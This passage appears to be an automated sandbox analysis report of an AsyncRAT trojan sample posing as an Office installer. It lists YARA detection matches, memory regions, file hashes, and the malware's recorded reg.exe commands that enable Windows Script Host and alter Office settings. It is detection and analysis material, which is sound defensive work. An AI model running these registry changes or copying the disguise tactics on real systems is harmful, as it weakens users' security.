Source: Vulvvmkewji.exe, 00000003.00000002.1818612437.0000000007381000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1722917882.0000000003579000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1722917882.0000000003479000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1818612437.0000000007451000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.2090595290.0000000007AF0000.00000004.08000000.00040000.00000000.sdmp, Lxfrfbi.exe, 0000000C.00000002.1931713295.0000000003269000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 0000000C.00000002.1931713295.0000000003169000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 00000010.00000002.2101694396.0000000003AF5000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 00000010.00000002.2101694396.00000000039F5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: Vulvvmkewji.exe, 00000003.00000002.1818612437.0000000007381000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1818612437.0000000007451000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.2090595290.0000000007AF0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/2152978/23354

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Yara detected AsyncRAT
Source: Yara match File source: 16.2.Lxfrfbi.exe.3c7cd6c.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Vulvvmkewji.exe.36bbf70.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.Lxfrfbi.exe.33f31b0.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Vulvvmkewji.exe.3709a7c.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.Lxfrfbi.exe.3c35eec.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.Lxfrfbi.exe.3c7cd6c.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.Lxfrfbi.exe.33ac330.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Vulvvmkewji.exe.3709a7c.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.Lxfrfbi.exe.33f31b0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.1931713295.00000000033E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2012368541.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2920632986.00000000068F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1722917882.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2101694396.0000000003C6D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Vulvvmkewji.exe PID: 7280, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: AppLaunch.exe PID: 7608, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Lxfrfbi.exe PID: 7936, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: AppLaunch.exe PID: 8084, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Lxfrfbi.exe PID: 8140, type: MEMORYSTR

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: dump.pcap, type: PCAP Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 16.2.Lxfrfbi.exe.3c7cd6c.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 16.2.Lxfrfbi.exe.3c7cd6c.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 3.2.Vulvvmkewji.exe.36bbf70.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 3.2.Vulvvmkewji.exe.36bbf70.4.unpack, type: UNPACKEDPE Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 12.2.Lxfrfbi.exe.33f31b0.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 12.2.Lxfrfbi.exe.33f31b0.4.unpack, type: UNPACKEDPE Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 3.2.Vulvvmkewji.exe.3709a7c.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 3.2.Vulvvmkewji.exe.3709a7c.2.unpack, type: UNPACKEDPE Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 16.2.Lxfrfbi.exe.3c35eec.5.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 16.2.Lxfrfbi.exe.3c35eec.5.unpack, type: UNPACKEDPE Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 16.2.Lxfrfbi.exe.3c7cd6c.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 16.2.Lxfrfbi.exe.3c7cd6c.3.unpack, type: UNPACKEDPE Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 12.2.Lxfrfbi.exe.33ac330.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 12.2.Lxfrfbi.exe.33ac330.0.unpack, type: UNPACKEDPE Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 15.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 15.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 3.2.Vulvvmkewji.exe.3709a7c.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 3.2.Vulvvmkewji.exe.3709a7c.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 12.2.Lxfrfbi.exe.33f31b0.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 12.2.Lxfrfbi.exe.33f31b0.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 0000000C.00000002.1931713295.00000000033E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 0000000C.00000002.1931713295.00000000033E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 0000000F.00000002.2012368541.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 0000000A.00000002.2944600925.0000000008E00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000A.00000002.2920632986.00000000068F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000011.00000002.2103131027.0000000005465000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000A.00000002.2944600925.0000000008ED8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000F.00000002.2133699444.0000000009596000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000F.00000002.2027914076.00000000070E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000003.00000002.1722917882.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 00000003.00000002.1722917882.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000010.00000002.2101694396.0000000003C6D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 00000010.00000002.2101694396.0000000003C6D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000011.00000002.2121649452.000000000703C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: Process Memory Space: AppLaunch.exe PID: 7608, type: MEMORYSTR Matched rule: Detects AsyncRAT Author: ditekSHen
Source: Process Memory Space: Lxfrfbi.exe PID: 7936, type: MEMORYSTR Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: Process Memory Space: AppLaunch.exe PID: 8084, type: MEMORYSTR Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: Process Memory Space: AppLaunch.exe PID: 8084, type: MEMORYSTR Matched rule: Detects AsyncRAT Author: ditekSHen
Source: Process Memory Space: Lxfrfbi.exe PID: 8140, type: MEMORYSTR Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: Process Memory Space: AppLaunch.exe PID: 7432, type: MEMORYSTR Matched rule: Detects AsyncRAT Author: ditekSHen
Detected potential crypto function
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_0520B578 1_2_0520B578
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_0520B568 1_2_0520B568
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Code function: 3_2_030C278A 3_2_030C278A
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Code function: 3_2_030C11E8 3_2_030C11E8
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Code function: 3_2_030C14C8 3_2_030C14C8
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Code function: 3_2_030C1E3A 3_2_030C1E3A
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Code function: 3_2_030C2AC0 3_2_030C2AC0
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Code function: 3_2_030C2837 3_2_030C2837
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Code function: 3_2_030C1502 3_2_030C1502
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Code function: 3_2_030C1579 3_2_030C1579
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Code function: 3_2_030C14B9 3_2_030C14B9
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Code function: 3_2_030C1A6F 3_2_030C1A6F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 10_2_067765C0 10_2_067765C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 10_2_06775CF0 10_2_06775CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 10_2_06773500 10_2_06773500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 10_2_0677A878 10_2_0677A878
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 10_2_067759A8 10_2_067759A8
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Code function: 12_2_014F205C 12_2_014F205C
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Code function: 12_2_014F278A 12_2_014F278A
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Code function: 12_2_014F11E8 12_2_014F11E8
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Code function: 12_2_014F14C8 12_2_014F14C8
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Code function: 12_2_014F207B 12_2_014F207B
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Code function: 12_2_014F2837 12_2_014F2837
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Code function: 12_2_014F2AC0 12_2_014F2AC0
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Code function: 12_2_014F1579 12_2_014F1579
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Code function: 12_2_014F14B9 12_2_014F14B9
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Code function: 12_2_014F78E0 12_2_014F78E0
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Code function: 12_2_014F78F0 12_2_014F78F0
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Code function: 12_2_014F1A6F 12_2_014F1A6F
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Code function: 12_2_072C8C80 12_2_072C8C80
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Code function: 12_2_072CB3BC 12_2_072CB3BC
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Code function: 12_2_072C9FD0 12_2_072C9FD0
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Code function: 12_2_072C85B1 12_2_072C85B1
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Code function: 12_2_072C85C0 12_2_072C85C0
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Code function: 12_2_072CE3CD 12_2_072CE3CD
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Code function: 12_2_072CE3D0 12_2_072CE3D0
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Code function: 12_2_072C8C2C 12_2_072C8C2C
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Code function: 12_2_072C9FC1 12_2_072C9FC1
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Code function: 12_2_08174198 12_2_08174198
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Code function: 12_2_08174188 12_2_08174188
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Code function: 12_2_08178CF9 12_2_08178CF9
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Code function: 12_2_08178D08 12_2_08178D08
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Code function: 12_2_081CD480 12_2_081CD480
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Code function: 12_2_081CED68 12_2_081CED68
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Code function: 12_2_081B0006 12_2_081B0006
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Code function: 12_2_081B0040 12_2_081B0040
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Code function: 16_2_01A1278C 16_2_01A1278C
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Code function: 16_2_01A111E8 16_2_01A111E8
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Code function: 16_2_01A114C8 16_2_01A114C8
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Code function: 16_2_01A11E3A 16_2_01A11E3A
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Code function: 16_2_01A12837 16_2_01A12837
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Code function: 16_2_01A12AC0 16_2_01A12AC0
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Code function: 16_2_01A11502 16_2_01A11502
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Code function: 16_2_01A11579 16_2_01A11579
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Code function: 16_2_01A114B9 16_2_01A114B9
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Code function: 16_2_01A1791C 16_2_01A1791C
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Code function: 16_2_01A178E0 16_2_01A178E0
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Code function: 16_2_01A178F0 16_2_01A178F0
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Code function: 16_2_01A11A6F 16_2_01A11A6F
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Code function: 16_2_07AF8C80 16_2_07AF8C80
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Code function: 16_2_07AFB3BC 16_2_07AFB3BC
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Code function: 16_2_07AF9FC1 16_2_07AF9FC1
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Code function: 16_2_07AF85B1 16_2_07AF85B1
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Code function: 16_2_07AF85C0 16_2_07AF85C0
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Code function: 16_2_07AF8C2C 16_2_07AF8C2C
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Vulvvmkewji.exe 0D9C95A567B68AEA53A66B961220A6D5FF14134A91A7EE3B31DEC8A9EC74FAFA
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\Lxfrfbi.exe 0D9C95A567B68AEA53A66B961220A6D5FF14134A91A7EE3B31DEC8A9EC74FAFA
PE file contains more sections than normal
Source: Office Installer.exe.0.dr Static PE information: Number of sections : 17 > 10
Sample file is different than original file name gathered from version info
Source: Gm602axA2d.exe, 00000000.00000002.1681159516.0000000004DDD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename7z.sfx.exe, vs Gm602axA2d.exe
Source: Gm602axA2d.exe, 00000000.00000002.1681159516.0000000004DDD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename7z.exe, vs Gm602axA2d.exe
Source: Gm602axA2d.exe, 00000000.00000002.1681159516.0000000004DDD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: to be able to be painted.XF-NF6f076MLTSC2024-1203-4fb4OriginalFilenameProject393-9fb6WQ6bf4NT1040QC-KK869GBOffice 2013 kk-kz1041kk-KZGD9GF-K981159YV6-22PColombiaadd "HKCU\Software\Microsoft\Office\16.0\Common" /v "qmenable" /t REG_DWORD /d 0 /fDogfood_Canary1042PRX-QV9JF-G3Caribbean# vs Gm602axA2d.exe
Source: Gm602axA2d.exe, 00000000.00000002.1680581407.0000000004092000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameVulvvmkewji.exe< vs Gm602axA2d.exe
Uses 32bit PE files
Source: Gm602axA2d.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Uses reg.exe to modify the Windows registry
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe Process created: C:\Windows\System32\reg.exe "reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script Host\Settings" /v "Enabled" /t REG_DWORD /d 1 /f
Yara signature match
Source: dump.pcap, type: PCAP Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 16.2.Lxfrfbi.exe.3c7cd6c.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 16.2.Lxfrfbi.exe.3c7cd6c.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 3.2.Vulvvmkewji.exe.36bbf70.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 3.2.Vulvvmkewji.exe.36bbf70.4.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 12.2.Lxfrfbi.exe.33f31b0.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 12.2.Lxfrfbi.exe.33f31b0.4.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 3.2.Vulvvmkewji.exe.3709a7c.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 3.2.Vulvvmkewji.exe.3709a7c.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 16.2.Lxfrfbi.exe.3c35eec.5.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 16.2.Lxfrfbi.exe.3c35eec.5.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 16.2.Lxfrfbi.exe.3c7cd6c.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 16.2.Lxfrfbi.exe.3c7cd6c.3.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 12.2.Lxfrfbi.exe.33ac330.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 12.2.Lxfrfbi.exe.33ac330.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 15.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 15.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 3.2.Vulvvmkewji.exe.3709a7c.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 3.2.Vulvvmkewji.exe.3709a7c.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 12.2.Lxfrfbi.exe.33f31b0.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 12.2.Lxfrfbi.exe.33f31b0.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 0000000C.00000002.1931713295.00000000033E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 0000000C.00000002.1931713295.00000000033E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 0000000F.00000002.2012368541.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 0000000A.00000002.2944600925.0000000008E00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000A.00000002.2920632986.00000000068F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000011.00000002.2103131027.0000000005465000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000A.00000002.2944600925.0000000008ED8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000F.00000002.2133699444.0000000009596000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
